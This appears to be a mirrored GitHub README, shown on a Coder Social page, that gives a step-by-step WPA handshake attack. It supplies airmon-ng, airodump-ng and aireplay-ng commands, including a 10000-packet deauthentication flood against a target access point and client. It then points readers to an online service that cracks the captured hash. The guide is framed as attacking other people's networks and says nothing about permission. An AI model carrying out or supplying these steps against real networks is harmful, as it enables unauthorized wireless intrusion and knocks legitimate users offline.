Coder Social home page Coder Social logo

handshakeattack's Introduction

Wifi Hack Handshake attack

N|dc

Contents (İçindekiler)


Wifi Hack

Catch Handshake

() Monitor & Manage

Turning on monitor mode, example usage:

  • airmon-ng start <interface>
┌──(root💀kali)-[~]
└─# airmon-ng start wlan0

Airmon
iwconfig

Turning off monitor mode, example usage:

  • airmon-ng stop <interface>
┌──(root💀kali)-[~]
└─# airmon-ng stop wlan0

() Gathering information about networks

start monitoring networks, airodump-ng example usage:

┌──(root💀kali)-[~]
└─# airodump-ng wlan0mon

Airodump

BSSID = MAC Address
Power = PWR - Signal power
Data = the data we have
CH = Channel - What channel is it on
ENC = Encryption model
CIPHER = Decrypton model
ESSID = network name
Example airodump-ng usage:
  • For the information gathering and deauthentication attack for the network to be attacked, we first need to enter the following line of code, example usage: airodump-ng --bssid <bssid> --channel <channel_number> --write <filename> <interface>
┌──(root💀kali)-[~]
└─# airodump-ng --bssid 0A:1B:2C:3D:4E:5F --channel 5 --write handshake_file wlan0mon

() Attack target

  • Deauthentication attack, The product connected to wifi needs to be dropped from the network. Example usage:

aireplay-ng --deauth <#packets> -a <target_MAC> -c <station> <interface>

┌──(root💀kali)-[~]
└─# aireplay-ng --deauth 10000 -a 0A:1B:2C:3D:4E:5F -c 0A:1B:2C:3D:4E:5F wlan0mon

Aireplay

NOTE: Our goal here is to remove the user connected to our target network from the network and reconnect, and to capture and decrypt the encrypted numbers that occur in the air when the user wants to reconnect to the network.

() Decrypt Handshake

  • Previously, we were able to crack handshake files with the aircrack-ng command, but these days could take weeks, with the resource I will give you, you can crack the handshakes you have captured without even having to keep your computer open :)

https://hashes.com/en/decrypt/hash

Soon, the program written in python will come.

You can support us by joining our community, thanks for reading. > https://discord.gg/5sYSzWQJ3Z

handshakeattack's People

Contributors

upcontrol avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.